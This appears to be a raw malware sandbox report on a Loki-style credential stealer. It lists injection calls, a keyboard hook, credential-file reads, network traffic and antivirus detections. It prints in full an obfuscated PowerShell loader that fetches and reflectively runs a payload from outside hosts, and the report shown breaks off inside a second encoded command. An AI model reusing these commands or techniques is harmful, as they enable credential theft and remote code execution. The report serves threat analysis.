u4òŒKN5¹Ñ‹iíîø4<í<.a§ìW+±LE˜ï‡»ô+.4 Ms2zô!ié«Ú7ÂÙ¶»¢ìÃQsùIô«LA£LÔ ÊÖN«*pyIŸ9'*ÝTuÔ&¡×ÎÁœJxÝ»J›!ôߛ‹x÷j­T#þt²¼:©Šýõr"Ó<Ñ†ßHip çû[3.æbûhD͵ˆ—?üˆª8Gô¢ˆ˜·¢;üWÓM1Š·|¾†‚]V(LGo¦(§í£»R®÷œéÃ9î6tÌØ{߸ú5]X¶’ûò3’—`p¾fÕMð50PWu3¾Û t„k™‡ñb•2NsX—G6;±8Ðæ&9‚1yë°:©D¤ÆêAÑl -¿p—*(Qù[owk€‚oò-1„µÌ)=3ÅhÙòÆÈKQÐèÖ
Data sent qme8–‡ä¨Ea¼Äi=¦œÄ¾ĩgr«xÞ.{â/5 ÀÀÀ À 28,ÿimageupload.io  
Data sent FBAÀwùîˆ4wÝGÛ>½k+Ú¶¯s½EfE©»á¯`¦`ªÀÿéçS¬]ÖGԙhî]KDì‡S4ËzmgÈxÔNn0Ю%Ú+ΩÌl™œÙ¸/ßËÔ¶ ±c5)\?–Ç5îø´:Nf>ÌÓRü]¤‹Øž
Data sent €Ñ³×ü¤Û<”¤fë¸ÃD|x¬¡Èt¬>ƒ…I$šk¹Y!֜xŸÏ“žÖmÉ>ÿb5ãD€9ÈԎý{B'³Ï‚”}ÑÉC—v¨‰éòø þ(4°y( “°°½ v>dœµú{Z‰‘Ð+Üc~´ñ00”ëíŒÉ12'
Data sent GET /windows/HNB.txt HTTP/1.1 Host: 141.98.6.91 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description PWS Memory rule Generic_PWS_Memory_Zero
description Communications smtp rule Network_SMTP_dotNet
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Win32 PWS Loki rule Win32_PWS_Loki_m_Zero
description Run a KeyLogger rule KeyLogger
wmi SELECT * FROM Win32_Processor
receiver [] sender [] server 192.185.51.90
host 141.98.6.91
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2568
region_size: 270336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000003a4
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

 information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description RegAsm.exe tried to sleep 5456486 seconds, actually delayed analysis time by 5456486 seconds
file C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect
file C:\Users\test22\AppData\Roaming\FTPGetter\servers.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
registry HKEY_CURRENT_USER\SOFTWARE\FTPWare\COREFTP\Sites
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELdò5eà  ¼îÛ à@  @…œÛOàF  H.textô» ¼ `.rsrcFà¾@@.reloc Ä@B
base_address: 0x00400000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

WriteProcessMemory

 buffer:  €P€8€€h€ à¼\ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalName4532bc7c-f4dc-4e38-bcac-17c8e43baccb.exe(LegalCopyright |)OriginalFilename4532bc7c-f4dc-4e38-bcac-17c8e43baccb.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0043e000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

WriteProcessMemory

 buffer: Ð ð;
base_address: 0x00440000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2568
process_handle: 0x000003a4
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELdò5eà  ¼îÛ à@  @…œÛOàF  H.textô» ¼ `.rsrcFà¾@@.reloc Ä@B
base_address: 0x00400000
process_identifier: 2568
process_handle: 0x000003a4
1 1 0
Time & API Arguments Status Return Repeated

SetWindowsHookExA

 thread_identifier: 0
callback_function: 0x0091086a
hook_identifier: 13 (WH_KEYBOARD_LL)
module_address: 0x00400000
1 2359589 0
MicroWorld-eScan VB:Trojan.Valyria.8583
Arcabit VB:Trojan.Valyria.D2187
Symantec Scr.Malscript!gen11
ESET-NOD32 VBS/Kryptik.UA
Avast VBS:Obfuscated-KJ [Cryp]
Kaspersky HEUR:Trojan.Script.Generic
BitDefender VB:Trojan.Valyria.8583
Emsisoft VB:Trojan.Valyria.8583 (B)
VIPRE VB:Trojan.Valyria.8583
FireEye VB:Trojan.Valyria.8583
MAX malware (ai score=89)
GData VB:Trojan.Valyria.8583
AVG VBS:Obfuscated-KJ [Cryp]
file C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect
file C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry HKEY_CURRENT_USER\Software\RimArts\B2\Settings
registry HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

send

 buffer: qme8–‡ä¨Ea¼Äi=¦œÄ¾ĩgr«xÞ.{â/5 ÀÀÀ À 28,ÿimageupload.io  
socket: 1448
sent: 118
1 118 0

send

 buffer: FBAÀwùîˆ4wÝGÛ>½k+Ú¶¯s½EfE©»á¯`¦`ªÀÿéçS¬]ÖGԙhî]KDì‡S4ËzmgÈxÔNn0Ю%Ú+ΩÌl™œÙ¸/ßËÔ¶ ±c5)\?–Ç5îø´:Nf>ÌÓRü]¤‹Øž
socket: 1448
sent: 134
1 134 0

send

 buffer: €Ñ³×ü¤Û<”¤fë¸ÃD|x¬¡Èt¬>ƒ…I$šk¹Y!֜xŸÏ“žÖmÉ>ÿb5ãD€9ÈԎý{B'³Ï‚”}ÑÉC—v¨‰éòø þ(4°y( “°°½ v>dœµú{Z‰‘Ð+Üc~´ñ00”ëíŒÉ12'
socket: 1448
sent: 133
1 133 0

send

 buffer: GET /windows/HNB.txt HTTP/1.1 Host: 141.98.6.91 Connection: Keep-Alive
socket: 896
sent: 76
1 76 0
Process injection Process 2272 called NtSetContextThread to modify thread in remote process 2568
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4447214
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000039c
process_identifier: 2568
1 0 0
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LkJOSC9zd29kbml3LzE5LjYuODkuMTQxLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
parent_process powershell.exe martian_process C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
parent_process wscript.exe martian_process powershell -command "$Codigo = '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JMvkoUfwwBJMvHMoUfwwBJMvdoUfwwBJMvBhoUfwwBJMvHIoUfwwBJMvdoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGcoUfwwBJMvZQoUfwwBJMvgoUfwwBJMvDoUfwwBJMvoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGEoUfwwBJMvbgBkoUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGcoUfwwBJMvdoUfwwBJMvoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMvgoUfwwBJMvCsoUfwwBJMvPQoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEYoUfwwBJMvboUfwwBJMvBhoUfwwBJMvGcoUfwwBJMvLgBMoUfwwBJMvGUoUfwwBJMvbgBnoUfwwBJMvHQoUfwwBJMvaoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvYgBhoUfwwBJMvHMoUfwwBJMvZQoUfwwBJMv2oUfwwBJMvDQoUfwwBJMvToUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZwB0oUfwwBJMvGgoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBzoUfwwBJMvHQo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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JoUfwwBJMvBpoUfwwBJMvG0oUfwwBJMvYQBnoUfwwBJMvGUoUfwwBJMvVQByoUfwwBJMvGwoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJwBooUfwwBJMvHQoUfwwBJMvdoUfwwBJMvBwoUfwwBJMvHMoUfwwBJMvOgoUfwwBJMvvoUfwwBJMvC8oUfwwBJMvaQBtoUfwwBJMvGEoUfwwBJMvZwBloUfwwBJMvHUoUfwwBJMvcoUfwwBJMvBsoUfwwBJMvG8oUfwwBJMvYQBkoUfwwBJMvC4oUfwwBJMvaQBvoUfwwBJMvC8oUfwwBJMvaQBioUfwwBJMvC8oUfwwBJMvdwBzoUfwwBJMvDgoUfwwBJMvTQBBoUfwwBJMvEooUfwwBJMvNgBloUfwwBJMvHoUfwwBJMvoUfwwBJMvdoUfwwBJMvBpoUfwwBJMvEwoUfwwBJMvZgBHoUfwwBJMvHUoUfwwBJMvXwoUfwwBJMvxoUfwwBJMvDYoUfwwBJMvOQoUfwwBJMv3oUfwwBJMvDcoUfwwBJMvMwoUfwwBJMv4oUfwwBJMvDQoUfwwBJMvOQoUfwwBJMvyoUfwwBJMvC4oUfwwBJMvagBwoUfwwBJMvGcoUfwwBJMvJwoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvdwBloUfwwBJMvGIoUfwwBJMvQwBsoUfwwBJMvGkoUfwwBJMvZQBuoUfwwBJMvHQoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvTgBloUfwwBJMvHcoUfwwBJMvLQBPoUfwwBJMvGIoUfwwBJMvagBloUfwwBJMvGMoUfwwBJMvdoUfwwBJMvoUfwwBJMvgoUfwwBJMvFMoUfwwBJMveQBzoUfwwBJMvHQoUfwwBJMvZQBtoUfwwBJMvC4oUfwwBJMvTgBloUfwwBJMvHQoUfwwBJMvLgBXoUfwwBJMvGUoUfwwBJMvYgBDoUfwwBJMvGwoUfwwBJMvaQBloUfwwBJMvG4oUfwwBJMvdoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvaQBtoUfwwBJMvGEoUfwwBJMvZwBloUfwwBJMvEIoUfwwBJMveQB0oUfwwBJMvGUoUfwwBJMvcwoUfwwBJMvgoUfwwBJMvD0oUfwwBJMvIoUfwwBJMvoUfwwBJMvkoUfwwBJMvH